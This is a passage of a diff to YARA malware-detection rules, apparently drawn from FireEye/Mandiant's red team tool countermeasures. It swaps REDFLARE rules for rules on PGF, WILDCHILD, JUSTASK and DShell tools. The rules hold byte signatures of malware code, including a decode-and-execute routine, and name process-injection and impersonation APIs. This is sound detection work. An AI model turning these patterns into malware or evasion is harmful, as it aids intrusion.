"100d73b35f23b2fe84bf7cd37140bf4d" - logic_hash = "9fad845ed963fae46ac7ddc44407d5f6ed0a061f6a106764b9f912ef718279b4" + hash = "8c91a27bbdbe9fb0877daccd28bd7bb5" + logic_hash = "dfff615a1d329cf181294f7b0a32c11a21d66ff8a6aa6b9fcd183c9738369623" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 3 strings: - $alloc = { 45 8B C0 33 D2 [2-6] 00 10 00 00 [2-6] 04 00 00 00 [1-6] FF 15 [4-60] FF 15 [4] 85 C0 [4-40] 20 00 00 00 [4-40] FF 15 [4] 85 C0 } - $inject = { 83 F8 01 [2-20] 33 C0 45 33 C9 [3-10] 45 33 C0 [3-10] 33 D2 [30-100] FF 15 [4] 85 C0 [20-100] 01 00 10 00 [0-10] FF 15 [4] 85 C0 [4-30] FF 15 [4] 85 C0 [2-20] FF 15 [4] 83 F8 FF } - $s1 = "ResumeThread" fullword + $cond1 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 10 30 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 5C 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 00 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 } + $cond2 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 20 33 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 58 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 2C 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 } + $cond3 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 C7 45 ?? 00 00 00 00 C6 85 ?? ?? ?? ?? 00 68 03 01 00 00 6A 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 ?? 00 00 00 00 C6 45 ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 6A 01 6A 00 8D 8D ?? ?? ?? ?? 51 6A 00 68 9C 10 00 10 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 6A 14 FF 15 ?? ?? ?? ?? 83 C4 04 89 45 ?? 8B 45 ?? 8A 48 ?? 88 4D ?? 8B 55 ?? 83 C2 0C 8B 45 ?? 8B 0A 89 08 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 52 ?? 89 50 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 85 ?? ?? ?? ?? 83 C0 01 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 14 7D ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 11 0F B6 45 ?? 33 D0 8B 4D ?? 03 8D ?? ?? ?? ?? 88 11 EB ?? 8B 55 ?? 8B 42 ?? 89 45 ?? 6A 40 68 00 30 00 00 8B 4D ?? 51 6A 00 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B 45 ?? 83 C0 20 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 83 C2 01 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 09 8B 85 ?? ?? ?? ?? 99 BE 14 00 00 00 F7 FE 8B 45 ?? 0F B6 14 10 33 CA 8B 45 ?? 03 85 ?? ?? ?? ?? 88 08 EB ?? 8B 4D ?? 89 4D ?? FF 55 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 } + $cond4 = { 8B FF 55 8B EC 81 EC 3? ?1 ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 E0 56 C7 45 F8 ?? ?? ?? ?? C6 85 D8 FE FF FF ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 D9 FE FF FF 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 F4 ?? ?? ?? ?? C6 45 E7 ?? C7 45 E8 ?? ?? ?? ?? C7 45 EC ?? ?? ?? ?? C7 45 FC ?? ?? ?? ?? C7 45 F? ?? ?? ?? ?0 6A ?? 6A ?? 8D 8D D8 FE FF FF 51 6A ?? 68 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 F8 6A ?? FF ?? ?? ?? ?? ?? 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 ?? ?? 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF ?? ?? ?? ?? EB ?? 8B 85 D4 FE FF FF 83 C? ?1 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D ?? 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB ?? 8B 55 F8 8B 42 08 89 45 FC 6A ?? 68 ?? ?? ?? ?? 8B 4D FC 51 6A ?? FF ?? ?? ?? ?? ?? 89 45 EC 8B 55 FC 52 8B 45 F8 83 ?? ?? 50 8B 4D EC 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 D0 FE FF FF ?? ?? ?? ?? EB ?? 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 ?? 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE ?? ?? ?? ?? F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB ?? 8B 4D EC 89 4D F0 FF ?? ?? 5E 8B 4D E0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and any of them } -rule FIREEYE_RT_APT_Downloader_Win32_REDFLARE_1 : FILE +rule FIREEYE_RT_APT_Loader_Win_PGF_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "PDB string used in some PGF DLL samples" author = "FireEye" - id = "e8d7ee31-568e-58ac-98ad-49baa2eb37ea" - date = "2020-11-27" - date = "2020-11-27" + id = "14e2102c-3572-5314-999c-ff3f6c94de03" + date = "2024-03-04" + modified = "2024-03-04" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_1.yar#L4-L17" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "013c7708f1343d684e3571453261b586" + logic_hash = "9dede268d33a38e980026917bd01bc47a72bfe60ba4a999c91eb727a2f377462" + score = 75 + quality = 73 + tags = "FILE" + rev = 6 + + strings: + $pdb1 = /RSDS[\x00-\xFF]{20}c:\\source\\dllconfig-master\\dllsource[\x00-\xFF]{0,500}\.pdb\x00/ nocase + $pdb2 = /RSDS[\x00-\xFF]{20}C:\\Users\\Developer\\Source[\x00-\xFF]{0,500}\\Release\\DllSource\.pdb\x00/ nocase + $pdb3 = /RSDS[\x00-\xFF]{20}q:\\objchk_win7_amd64\\amd64\\init\.pdb\x00/ nocase + + condition: + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and filesize <15MB and any of them +} +rule FIREEYE_RT_APT_Loader_Win64_PGF_2 : FILE +{ + meta: + description = "base dlls: /lib/payload/techniques/dllmain/" + author = "FireEye" + id = "5253cb2a-28fd-57ab-be3d-f11cf2ea24cf" + date = "2020-11-25" + date = "2020-11-25" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win32_REDFLARE_1.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_2.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "05b99d438dac63a5a993cea37c036673" - logic_hash = "a340a2a732a9b1aa74ca9d84009a88d1b14b6a03140a859384c0d6e745e4a90a" + hash = "4326a7e863928ffbb5f6bdf63bb9126e" + logic_hash = "074f6d9ad78ecd4dd8e3d0b5c8b0f61a48374f3935b85c4222305b207b447ec7" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 2 strings: - $const = "Cookie: SID1=%s" fullword - $http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [1-10] 6A 00 8B [1-8] 5? 6A 00 6A 00 6A 00 8B [1-8] 5? 68 [4] 8B [1-8] 5? FF 15 [4-40] 6A 14 E8 } + $sb1 = { B9 [4] FF 15 [4-32] 8B ?? 1C [0-16] 0F B? ?? 04 [0-64] F3 0F 6F 00 [0-64] 66 0F EF C8 [0-64] F3 0F 7F 08 [0-64] 30 ?? 48 8D 40 01 48 83 ?? 01 7? } + $sb2 = { 44 8B ?? 08 [0-32] 41 B8 00 30 00 00 [0-16] FF 15 [4-32] 48 8B C8 [0-16] E8 [4-64] 4D 8D 49 01 [0-32] C1 ?? 04 [0-64] 0F B? [2-16] 41 30 ?? FF 45 3? ?? 7? } + $sb3 = { 63 ?? 3C [0-16] 03 [1-32] 0F B? ?? 14 [0-16] 8D ?? 18 [0-16] 03 [1-16] 66 ?? 3B ?? 06 7? [1-64] 48 8D 15 [4-32] FF 15 [4-16] 85 C0 [2-32] 41 0F B? ?? 06 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_4 : FILE +rule FIREEYE_RT_APT_Loader_MSIL_WILDCHILD_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "6e8621b0-a0ee-5fc7-a2b8-1973a42d6e37" + id = "b9e0707e-98eb-55da-ad1d-6a84bd113747" date = "2020-12-01" date = "2020-12-01" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_4.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/APT_Loader_MSIL_WILDCHILD_1.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "a8b5dcfea5e87bf0e95176daa243943d, 9dcb6424662941d746576e62712220aa" - logic_hash = "d027e98ad8fa6d03a49ceffd81fba6a621173e2dbabae652bee2f4e8489bb378" + hash = "6f04a93753ae3ae043203437832363c4" + logic_hash = "a600c3d127f77dc1f99160e4a242e005970de0abd1798296b6a351b968ca1350" score = 75 quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $s1 = "LogonUserW" fullword - $s2 = "ImpersonateLoggedOnUser" fullword - $s3 = "runCommand" fullword - $user_logon = { 22 02 00 00 [1-10] 02 02 00 00 [0-4] E8 [4-40] ( 09 00 00 00 [1-10] 03 00 00 00 | 6A 03 6A 09 ) [4-30] FF 15 [4] 85 C0 7? } + $s1 = "\x00QueueUserAPC\x00" + $s2 = "\x00WriteProcessMemory\x00" + $sb1 = { 6F [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 13 ?? 28 [2] 00 0A 28 [2] 00 0A 13 ?? 11 ?? 11 ?? 28 [2] 00 0A [0-16] 7B [2] 00 04 1? 20 [4] 28 [2] 00 0A 11 ?? 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 [0-16] 14 7E [2] 00 0A 7E [2] 00 0A 1? 20 04 00 08 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 [0-16] 7B [2] 00 04 7E [2] 00 0A [0-16] 8E ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 [4-120] 28 [2] 00 06 [0-80] 6F [2] 00 0A 6F [2] 00 0A 28 [2] 00 06 13 ?? 11 ?? 11 ?? 7E [2] 00 0A 28 [2] 00 06 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Controller_Linux_REDFLARE_1 : FILE +rule FIREEYE_RT_Loader_MSIL_Wildchild_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the WildChild project." author = "FireEye" - id = "79a69740-7209-5c56-ad6f-eb4d0b29beaf" - date = "2020-12-02" - date = "2020-12-02" + id = "350dd658-46c9-573b-b532-07e4b437ba8d" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Controller_Linux_REDFLARE_1.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Loader_MSIL_WildChild_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e" - logic_hash = "d6b0cc5f386da9bff8a8293f2b3857406044ab42f7c1bb23d5096052a3c42ce4" + hash = "7e6bc0ed11c2532b2ae7060327457812" + logic_hash = "e4320e33770613542182518ec787e4ccbb32f83c8afca5ec957d4846e6f4eb04" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 1 + rev = 4 strings: - $1 = "/RedFlare/gorat_server" - $2 = "RedFlare/sandals" - $3 = "goratsvr.CommandResponse" fullword - $4 = "goratsvr.CommandRequest" fullword + $typelibguid1 = "2e71d5ff-ece4-4006-9e98-37bb724a7780" ascii nocase wide condition: - ( uint32(0)==0x464c457f) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 } -rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_8 : FILE +rule FIREEYE_RT_Dropper_HTA_Wildchild_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "This rule looks for strings present in unobfuscated HTAs generated by the WildChild builder." author = "FireEye" - id = "b090df60-8f4e-51ca-944c-6f9ce2d9c913" - date = "2020-12-02" - date = "2020-12-02" + id = "f570baa5-7d58-5a0a-b713-769e62076f76" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_8.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Dropper_HTA_WildChild_1.yar#L4-L24" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "9c8eb908b8c1cda46e844c24f65d9370, 9e85713d615bda23785faf660c1b872c" - logic_hash = "5b8a0402886daebefb995e7df0877d51727c5b8dc58eeb8ff16ceec5e7811a20" + hash = "3e61ca5057633459e96897f79970a46d" + logic_hash = "60c1d53b8a43b9b7518f3260a4d61c6806641ee894a2a331a3a0a2ea0aff9d99" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 5 strings: - $1 = "PSRunner.PSRunner" fullword - $2 = "CorBindToRuntime" fullword - $3 = "ReportEventW" fullword - $4 = "InvokePS" fullword wide - $5 = "runCommand" fullword - $6 = "initialize" fullword - $trap = { 03 40 00 80 E8 [4] CC } + $s1 = "processpath" ascii wide + $s2 = "v4.0.30319" ascii wide + $s3 = "v2.0.50727" ascii wide + $s4 = "COMPLUS_Version" ascii wide + $s5 = "FromBase64Transform" ascii wide + $s6 = "MemoryStream" ascii wide + $s7 = "entry_class" ascii wide + $s8 = "DynamicInvoke" ascii wide + $s9 = "Sendoff" ascii wide + $script_header = "<script language=" ascii wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + $script_header at 0 and all of ($s*) } -rule FIREEYE_RT_APT_Keylogger_Win32_REDFLARE_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_JUSTASK_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'justask' project." author = "FireEye" - id = "ad14db66-d640-5712-b2c8-a3d42d5a90f3" - date = "2020-12-01" - date = "2020-12-01" + id = "06a03d82-db69-5b5a-a578-a8053814e917" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win32_REDFLARE_1.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/JUSTASK/production/yara/APT_HackTool_MSIL_JUSTASK_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "d7cfb9fbcf19ce881180f757aeec77dd" - logic_hash = "aebbaa050bee3775ffac4214ea4ab58284384e7eb41e66ee4838b9359e72821e" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "24d2f8e3838c4f02cd80644a396ce7cf105761d2feba54e39973564ca5e97571" score = 75 - quality = 75 + quality = 73 tags = "FILE" rev = 2 strings: - $create_window = { 6A 00 68 [4] 6A 00 6A 00 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 CF 00 68 [4] 68 [4] 6A 00 FF 15 } - $keys_check = { 6A 14 [0-5] FF [1-5] 6A 10 [0-5] FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A0 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A1 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 74 } + $typelibguid0 = "aa59be52-7845-4fed-9ea5-1ea49085d67a" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_7 : FILE +rule FIREEYE_RT_APT_Backdoor_Win_Dshell_2 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "This rule looks for strings specific to the D programming language in combination with a selection of Windows functions that are present within a DShell payload" author = "FireEye" - id = "f891e477-9ff2-57be-9ca5-dd87d9baee29" - date = "2020-12-02" - date = "2020-12-02" + id = "538e150f-0fb9-5a85-9299-9b4a57f8a606" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_7.yar#L4-L21" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/supplemental/yara/APT_Backdoor_Win_DShell_2.yar#L4-L132" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "e7beece34bdf67cbb8297833c5953669, 8025bcbe3cc81fc19021ad0fbc11cf9b" - logic_hash = "6d7822256ac1bef05304d3396df773e2b20a397311ad820d6ec5fe4cb6bdfbbc" - score = 75 - quality = 75 + hash = "e0683f8ee787313cfd2c61cd0995a830" + logic_hash = "2b4d33c17cac35153346002c48457d9b46010f1c052df632c647c22c8d96b54c" + score = 60 + quality = 20 tags = "FILE" - rev = 1 + rev = 4 strings: - $1 = "initialize" fullword - $2 = "getData" fullword - $3 = "putData" fullword - $4 = "fini" fullword - $5 = "NamedPipe" - $named_pipe = { 88 13 00 00 [1-8] E8 03 00 00 [20-60] 00 00 00 00 [1-8] 00 00 00 00 [1-40] ( 6A 00 6A 00 6A 03 6A 00 6A 00 68 | 00 00 00 00 [1-6] 00 00 00 00 [1-6] 03 00 00 00 45 33 C? 45 33 C? BA ) 00 00 00 C0 [2-10] FF 15 [4-30] FF 15 [4-7] E7 00 00 00 [4-40] FF 15 [4] 85 C0 } + $dlang1 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\utf.d" ascii wide + $dlang2 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\file.d" ascii wide + $dlang3 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\format.d" ascii wide + $dlang4 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\base64.d" ascii wide + $dlang5 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\stdio.d" ascii wide + $dlang6 = "\\..\\..\\src\\phobos\\std\\utf.d" ascii wide + $dlang7 = "\\..\\..\\src\\phobos\\std\\file.d" ascii wide + $dlang8 = "\\..\\..\\src\\phobos\\std\\format.d" ascii wide + $dlang9 = "\\..\\..\\src\\phobos\\std\\base64.d" ascii wide + $dlang10 = "\\..\\..\\src\\phobos\\std\\stdio.d" ascii wide + $dlang11 = "Unexpected '\\n' when converting from type const(char)[] to type int" ascii wide + $ign1 = "--strip-comments" + $ign2 = "Usage: rdmd [RDMD AND DMD OPTIONS]" + $s1 = "CloseHandle" + $s2 = "CommandLineToArgvW" + $s3 = "CreateFileA" + $s4 = "CreateSemaphoreA" + $s5 = "CreateThread" + $s6 = "DeleteCriticalSection" + $s7 = "DeleteFileA" + $s8 = "DuplicateHandle" + $s9 = "EnterCriticalSection" + $s10 = "ExitProcess" + $s11 = "ExitThread" + $s12 = "ExpandEnvironmentStringsW" + $s13 = "FileTimeToDosDateTime" + $s14 = "FindClose" + $s15 = "FindFirstFileA" + $s16 = "FindFirstFileW" + $s17 = "FindNextFileA" + $s18 = "FindNextFileW" + $s19 = "FormatMessageW" + $s20 = "FreeEnvironmentStringsA" + $s21 = "FreeEnvironmentStringsW" + $s22 = "FreeLibrary" + $s23 = "GetACP" + $s24 = "GetCPInfo" + $s25 = "GetCommandLineA" + $s26 = "GetCommandLineW" + $s27 = "GetConsoleOutputCP" + $s28 = "GetConsoleScreenBufferInfo" + $s29 = "GetCurrentProcess" + $s30 = "GetCurrentThread" + $s31 = "GetCurrentThreadId" + $s32 = "GetEnvironmentStrings" + $s33 = "GetEnvironmentStringsW" + $s34 = "GetEnvironmentVariableA" + $s35 = "GetEnvironmentVariableW" + $s36 = "GetExitCodeThread" + $s37 = "GetFileAttributesW" + $s38 = "GetFileType" + $s39 = "GetLastError" + $s40 = "GetModuleFileNameA" + $s41 = "GetModuleHandleA" + $s42 = "GetOEMCP" + $s43 = "GetProcAddress" + $s44 = "GetProcessHeap" + $s45 = "GetStdHandle" + $s46 = "GetStringTypeA" + $s47 = "GetSystemInfo" + $s48 = "GetThreadContext" + $s49 = "GetTickCount" + $s50 = "GetTimeZoneInformation" + $s51 = "GetVersion" + $s52 = "GlobalAlloc" + $s53 = "GlobalFree" + $s54 = "GlobalMemoryStatus" + $s55 = "HeapAlloc" + $s56 = "HeapFree" + $s57 = "HeapReAlloc" + $s58 = "InitializeCriticalSection" + $s59 = "IsDebuggerPresent" + $s60 = "LCMapStringA" + $s61 = "LeaveCriticalSection" + $s62 = "LoadLibraryA" + $s63 = "LoadLibraryW" + $s64 = "LocalFree" + $s65 = "MessageBoxA" + $s66 = "MultiByteToWideChar" + $s67 = "QueryPerformanceCounter" + $s68 = "QueryPerformanceFrequency" + $s69 = "RaiseException" + $s70 = "ReadFile" + $s71 = "RegCloseKey" + $s72 = "RegCreateKeyExW" + $s73 = "RegDeleteKeyW" + $s74 = "RegDeleteValueW" + $s75 = "RegEnumKeyExW" + $s76 = "RegEnumValueW" + $s77 = "RegFlushKey" + $s78 = "RegOpenKeyExW" + $s79 = "RegOpenKeyW" + $s80 = "RegQueryInfoKeyW" + $s81 = "RegQueryValueExW" + $s82 = "RegSetValueExW" + $s83 = "ReleaseSemaphore" + $s84 = "ResumeThread" + $s85 = "RtlCaptureContext" + $s86 